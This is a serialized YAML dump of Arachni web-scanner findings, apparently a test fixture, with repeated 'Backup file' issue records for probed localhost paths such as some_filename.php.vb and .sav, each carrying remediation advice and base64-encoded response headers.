WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.pas
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.pas
injected: some_filename.php.pas
id: some_filename.php.pas
elem: path
remarks: {}
method: ''
response: some_filename.php.pas
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.pas
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.pas
injected: some_filename.pas
id: some_filename.pas
elem: path
remarks: {}
method: ''
response: some_filename.pas
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: true
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.vb
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.vb
injected: some_filename.php.vb
id: some_filename.php.vb
elem: path
remarks: {}
method: ''
response: some_filename.php.vb
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.vb
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.vb
injected: some_filename.vb
id: some_filename.vb
elem: path
remarks: {}
method: ''
response: some_filename.vb
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.java
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.java
injected: some_filename.php.java
id: some_filename.php.java
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: some_filename.php.java
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.java
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.java
injected: some_filename.java
id: some_filename.java
elem: path
remarks: {}
method: ''
response: some_filename.java
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.class
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.class
injected: some_filename.php.class
id: some_filename.php.class
elem: path
remarks: {}
method: ''
response: some_filename.php.class
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.class
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.class
injected: some_filename.class
id: some_filename.class
elem: path
remarks: {}
method: ''
response: some_filename.class
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTk=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.sav
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.sav
injected: some_filename.php.sav
id: some_filename.php.sav
elem: path
remarks: {}
method: ''
response: some_filename.php.sav
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.sav
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.sav
injected: some_filename.sav
id: some_filename.sav
elem: path
remarks: {}
method: ''
response: some_filename.sav
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.saved
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.saved
injected: some_filename.php.saved
id: some_filename.php.saved
elem: path
remarks: {}
method: ''
response: some_filename.php.saved
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.saved
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.saved
injected: some_filename.saved
id: some_filename.saved
elem: path
remarks: {}
method: ''
response: some_filename.saved
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTk=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.rar
elem: path
method: ''
name: Backup file
